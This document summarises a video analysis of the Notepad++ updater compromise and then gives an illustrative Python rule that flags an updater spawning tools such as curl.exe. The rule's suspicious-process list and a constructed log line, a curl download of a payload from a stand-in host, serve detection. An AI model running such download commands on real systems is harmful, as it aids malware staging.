How this Popular Text Editor shipped Malware
A state-sponsored actor (likely Chinese) compromised Notepad++'s hosting provider, Hostinger, to hijack the WinGUp updater and deliver malware to users. The attack exploited the updater's lack of SSL certificate validation, allowing malicious download URLs to be served intermittently, which made detection extremely difficult. The payload used a numeric-encoded shellcode blob to evade AV detection, ultimately loading a Cobalt Strike beacon via an Alibaba Cloud C2 server. The video walks through the full attack chain using procmon, Binary Ninja, and sandbox analysis, and discusses how endpoint tools such as ThreatLocker could have blocked the anomalous behavior of the updater spawning curl.exe.
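The detection idea at the end of the summary, an updater process that should never launch a download tool suddenly spawning curl.exe, can be expressed as a simple parent-child rule over process-creation events. The following is an added example, not code from the video or from Notepad++; the log format and field names are constructed for illustration, and the assumption that the WinGUp updater runs as gup.exe is mine.

```python
from dataclasses import dataclass
from typing import Dict, List

# Assumption: the WinGUp updater binary is named gup.exe.
UPDATER_IMAGES = {"gup.exe"}
# Children an updater has no legitimate reason to launch (illustrative set).
SUSPICIOUS_CHILDREN = {"curl.exe", "powershell.exe", "cmd.exe", "mshta.exe", "certutil.exe"}


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_anomalous_spawn(ev: ProcessEvent) -> bool:
    """True when an updater process launches a tool from the suspicious set."""
    return basename(ev.parent_image) in UPDATER_IMAGES and basename(ev.image) in SUSPICIOUS_CHILDREN


def parse_event(line: str) -> ProcessEvent:
    """Parse one constructed 'Key=Value|Key=Value' process-creation record."""
    fields: Dict[str, str] = dict(part.split("=", 1) for part in line.split("|"))
    return ProcessEvent(fields["ParentImage"], fields["Image"], fields["CommandLine"])


def detect(lines: List[str]) -> List[ProcessEvent]:
    """Return every event in which an updater spawned a suspicious child."""
    return [ev for ev in map(parse_event, lines) if is_anomalous_spawn(ev)]


# Constructed sample events: one benign updater-to-editor restart, one ordinary
# launch from Explorer, and one updater-to-curl.exe spawn that should be flagged.
SAMPLE_LOG = [
    r"ParentImage=C:\Program Files\Notepad++\updater\gup.exe|Image=C:\Program Files\Notepad++\notepad++.exe|CommandLine=notepad++.exe",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Program Files\Notepad++\notepad++.exe|CommandLine=notepad++.exe",
    r"ParentImage=C:\Program Files\Notepad++\updater\gup.exe|Image=C:\Windows\System32\curl.exe|CommandLine=curl.exe -o C:\Users\Public\stage.bin https://update.invalid/stage",
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG):
        print(f"ALERT: {basename(hit.parent_image)} spawned {basename(hit.image)}: {hit.command_line}")
```

In practice the same rule is applied to Sysmon Event ID 1 or an EDR's process-creation telemetry, with the benign child set (here, notepad++.exe restarting after an update) allow-listed rather than hard-coded.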